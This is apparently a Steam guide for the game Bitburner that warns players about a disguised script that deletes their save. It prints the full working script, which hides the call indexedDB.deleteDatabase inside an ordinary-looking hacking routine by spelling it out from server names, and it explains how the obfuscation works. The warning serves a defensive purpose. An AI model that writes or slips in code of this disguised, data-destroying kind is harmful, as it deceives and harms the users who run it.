大D病毒

This details the most dangerous exploit ever discovered by the bitburner community. It would be considered a Level 3 Bug under Apple's Security Bounty program, as it allows broad, unauthorized access to sensitive data via a user-installed app (in this case, a js file). In this report is a source code file that, if you run it, will delete your save invisibly. You will not know that your save has been deleted until you reload the game, at which point, you will return to the Tutorial. This is being published in an effort to warn all users of the dangers of copying and running source code from untrusted sources, such as this Steam page, without thoroughly reading, reviewing, and reimplementing it in your own words. Dangerous Source Code This will delete your save. Do not run without first exporting your save. /** @param {NS} ns **/ export async function main(ns) { let attackers = ["home"] let attackable = [ "darkweb", "univ-energy", "titan-labs", "applied-energetics", "taiyangdigital", "alpha-ent", "Defcomm", "b-and-a", "titanlabs", "aerocorp", "blade", "fulcrum-assets", "syscore", "ecorp" ] let hostnames = attackable.map(s => s.split("-")[1] || s[0]).map(s => s[0]).join("") for (let hostname of hostnames) { // ns.print("--------------------------") // ns.print(hostname, " ", ns.getServerMaxRam(hostname) - ns.getServerUsedRam(hostname)) // ns.print("--------------------------") } if (ns.getPlayer().money > 110000) { let server = ns.purchaseServer("bitburnerSave", 2) ns.tprint("purchased server: ", indexedDB[hostnames](server)) } try { for (let target of attackable) { if (ns.getServerSecurityLevel(target) > ns.getServerMinSecurityLevel(target)) { await ns.weaken(target) } else if (ns.getServerMoneyAvailable(target) < ns.getServerMaxMoney(target)) { await ns.grow(target) } } } catch { ns.tprint("error attacking") } } Limit of Vulnerability No sandbox escape: This cannot harm your computer in any way. Its effects are limited to the window Bitburner is running in. The browser 'sandboxes' the Bitburner client. To escape this sandbox, you'd have to defeat Google Chrome's security, which is functionally impossible, as there are millions of professional security researchers around the world who make their livelihood trying to do just that. If a sandbox escape was discovered, I expect the discoverer would prefer to claim the bug bounty (or sell it to the highest bidder) rather than delete a bunch of Bitburner games. No Steam privileges: This also cannot harm your Steam account in any way. Technically, a similar exploit could be used to falsify achievements, but it could only grant new ones, not take old ones away... and achievements would be the limit of its control. The source code provided here will not modify your achievements. This exploit cannot modify exported save games. Bitburner provides an "Export Save Game" functionality and encourages users to regularly use it by providing a buff every 24h for exporting a save game. The exported save contains the database at the time of export. As a result, you can only lose data up to your most recent exported save. Importing that save restores all functionality. Explanation of Vulnerability If you run a javascript file containing the following command, your savestate will be deleted. indexedDB.deleteDatabase("bitburnerSave") While this exploit uses the word "bitburnerSave," that was just me being lazy. It does not use the word "deleteDatabase" anywhere. The attackable[] array was specially selected and ordered such that the first letter of each word, or, if the word contains a dash, the first letter of the second word, hide the word "deleteDatabase." "darkweb", "univ-energy", "titan-labs", "applied-energetics", "taiyangdigital", "alpha-ent", "Defcomm", "b-and-a", "titanlabs", "aerocorp", "blade", "fulcrum-assets", "syscore", "ecorp" Attacks of this nature -- reliable ones, at least -- will almost always rely on arrays of strings, which are javascript's only ordered data structure. Arrays of integers could be used, but this would likely make the attack more obvious, rather than less. The attack occurs in the ns.tprint() line after a server is purchased. This line explicitly calls the following function: indexedDB["deleteDatabase"]("bitburnerSave") Which is syntactically identical to the original attack function described earlier. I have characterized this as "The Big D Virus" because of the capital "D" in Defcomm. This capital "D" is critical to getting the specific string "deleteDatabase," as a lowercase "d" would yield "deletedatabase" and have no effect. Achieving that capitalization without specifically typing it as part of a string would require multiple layers of obfuscation so as to not reveal that it is generating a capital D, and every extra line of obfuscation sticks out like a sore thumb to someone reading the source code. You can prevent or eliminate your exposure to a rudimentary attack such as this by avoiding "Big D" source code -- any source code that contains a capital D stored in an array. That simple rule, plus reviewing the source and removing lines you don't understand (or learning exactly what they do, so that you do understand them), will fully protect you against this attack.